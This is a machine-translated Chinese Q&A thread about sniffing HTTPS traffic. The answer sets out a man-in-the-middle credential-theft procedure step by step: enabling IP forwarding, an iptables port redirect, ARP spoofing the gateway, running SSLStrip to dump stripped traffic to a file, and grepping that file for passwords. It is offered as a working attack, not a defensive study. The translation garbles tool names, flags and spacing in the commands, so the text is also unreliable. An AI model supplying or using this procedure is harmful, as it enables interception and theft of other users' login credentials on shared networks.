代码之家  ›  专栏  ›  技术社区  ›  Harry47

HTTPS/SSL嗅探

  •  1
  • Harry47  · 技术社区  · 12 年前

    我正在使用 背景5 为此。。但我被卡住了。。。我无法获得我想要的数据,我正在使用 伊特怪 SSL带 为此。。。

    这里有人知道怎么做吗?

    1 回复  |  直到 12 年前
        1
  •  2
  •   user1432395    12 年前

    我知道你是怎么做的,但对我来说,ettercap-gtk(gui)一直是垃圾。我建议跳过ettercap,除非你想要简单的DNS欺骗,然后走另一条路。

    让我给你一些步骤,首先为这次攻击设置iptables(中间人,amirite)并启用ip_forward(ing)

    echo“1”>/proc/sys/net/ipv4/ip_forward程序

    iptables-t nat-A PREROUTING-p tcp--目标端口80-j REDIRECT--到端口1337(可以选择要发送到的任何端口)

    现在,作为中间人:这里我们使用arpsopof: arpspoo-i wlan0(或任何接口)192.168.1.X(X通常是网关.1或.255)

    然后使用SSLStrip,您可以继续进行/sslstrip.py-1 1337-w文件名(1337是前面的端口,filename是要将数据转储到的任何文件名)

    cat文件名(来自前面的文件名),甚至管道|grep“密码”或您正在查找的任何内容,或者您可以转储所有内容。该文件将填充捕获/剥离的https数据。

    推荐文章
    Harry47  ·  HTTPS/SSL嗅探
    12 年前